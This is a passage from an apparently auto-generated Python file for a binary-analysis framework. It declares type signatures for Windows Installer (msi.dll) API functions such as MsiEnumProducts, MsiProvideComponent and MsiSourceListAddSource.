'MsiGetFeatureUsageW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "pdwUseCount", "pwDateUsed"]),
#
'MsiConfigureFeatureA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "eInstallState"]),
#
'MsiConfigureFeatureW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "eInstallState"]),
#
'MsiReinstallFeatureA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "dwReinstallMode"]),
#
'MsiReinstallFeatureW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "dwReinstallMode"]),
#
'MsiProvideComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "szComponent", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "szComponent", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "szProduct", "dwUnused1", "dwUnused2", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideQualifiedComponentExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szCategory", "szQualifier", "dwInstallMode", "szProduct", "dwUnused1", "dwUnused2", "lpPathBuf", "pcchPathBuf"]),
#
'MsiGetComponentPathA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiGetComponentPathW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiGetComponentPathExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProductCode", "szComponentCode", "szUserSid", "dwContext", "lpOutPathBuffer", "pcchOutPathBuffer"]),
#
'MsiGetComponentPathExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProductCode", "szComponentCode", "szUserSid", "dwContext", "lpOutPathBuffer", "pcchOutPathBuffer"]),
#
'MsiProvideAssemblyA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypeInt(signed=False, label="MSIASSEMBLYINFO"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szAssemblyName", "szAppContext", "dwInstallMode", "dwAssemblyInfo", "lpPathBuf", "pcchPathBuf"]),
#
'MsiProvideAssemblyW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLMODE"), SimTypeInt(signed=False, label="MSIASSEMBLYINFO"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szAssemblyName", "szAppContext", "dwInstallMode", "dwAssemblyInfo", "lpPathBuf", "pcchPathBuf"]),
#
'MsiQueryComponentStateA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szComponentCode", "pdwState"]),
#
'MsiQueryComponentStateW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szComponentCode", "pdwState"]),
#
'MsiEnumProductsA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iProductIndex", "lpProductBuf"]),
#
'MsiEnumProductsW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iProductIndex", "lpProductBuf"]),
#
'MsiEnumProductsExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwIndex", "szInstalledProductCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumProductsExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwIndex", "szInstalledProductCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumRelatedProductsA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpUpgradeCode", "dwReserved", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumRelatedProductsW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpUpgradeCode", "dwReserved", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumFeaturesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iFeatureIndex", "lpFeatureBuf", "lpParentBuf"]),
#
'MsiEnumFeaturesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iFeatureIndex", "lpFeatureBuf", "lpParentBuf"]),
#
'MsiEnumComponentsA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iComponentIndex", "lpComponentBuf"]),
#
'MsiEnumComponentsW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["iComponentIndex", "lpComponentBuf"]),
#
'MsiEnumComponentsExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szUserSid", "dwContext", "dwIndex", "szInstalledComponentCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumComponentsExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szUserSid", "dwContext", "dwIndex", "szInstalledComponentCode", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumClientsA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumClientsW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iProductIndex", "lpProductBuf"]),
#
'MsiEnumClientsExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "szUserSid", "dwContext", "dwProductIndex", "szProductBuf", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumClientsExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "szUserSid", "dwContext", "dwProductIndex", "szProductBuf", "pdwInstalledContext", "szSid", "pcchSid"]),
#
'MsiEnumComponentQualifiersA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iIndex", "lpQualifierBuf", "pcchQualifierBuf", "lpApplicationDataBuf", "pcchApplicationDataBuf"]),
#
'MsiEnumComponentQualifiersW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "iIndex", "lpQualifierBuf", "pcchQualifierBuf", "lpApplicationDataBuf", "pcchApplicationDataBuf"]),
#
'MsiOpenProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "hProduct"]),
#
'MsiOpenProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "hProduct"]),
#
'MsiOpenPackageA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "hProduct"]),
#
'MsiOpenPackageW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "hProduct"]),
#
'MsiOpenPackageExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "dwOptions", "hProduct"]),
#
'MsiOpenPackageExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "dwOptions", "hProduct"]),
#
'MsiGetPatchFileListA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szPatchPackages", "pcFiles", "pphFileRecords"]),
#
'MsiGetPatchFileListW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szPatchPackages", "pcFiles", "pphFileRecords"]),
#
'MsiGetProductPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szProperty", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetProductPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szProperty", "lpValueBuf", "pcchValueBuf"]),
#
'MsiVerifyPackageA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath"]),
#
'MsiVerifyPackageW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath"]),
#
'MsiGetFeatureInfoA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szFeature", "lpAttributes", "lpTitleBuf", "pcchTitleBuf", "lpHelpBuf", "pcchHelpBuf"]),
#
'MsiGetFeatureInfoW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hProduct", "szFeature", "lpAttributes", "lpTitleBuf", "pcchTitleBuf", "lpHelpBuf", "pcchHelpBuf"]),
#
'MsiInstallMissingComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szComponent", "eInstallState"]),
#
'MsiInstallMissingComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szComponent", "eInstallState"]),
#
'MsiInstallMissingFileA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFile"]),
#
'MsiInstallMissingFileW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFile"]),
#
'MsiLocateComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiLocateComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiSourceListClearAllA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListClearAllW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListAddSourceA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved", "szSource"]),
#
'MsiSourceListAddSourceW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved", "szSource"]),
#
'MsiSourceListForceResolutionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListForceResolutionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListAddSourceExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource", "dwIndex"]),
#
'MsiSourceListAddSourceExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource", "dwIndex"]),
#
'MsiSourceListAddMediaDiskA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId", "szVolumeLabel", "szDiskPrompt"]),
#
'MsiSourceListAddMediaDiskW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId", "szVolumeLabel", "szDiskPrompt"]),
#
'MsiSourceListClearSourceA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource"]),
#
'MsiSourceListClearSourceW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource"]),
#
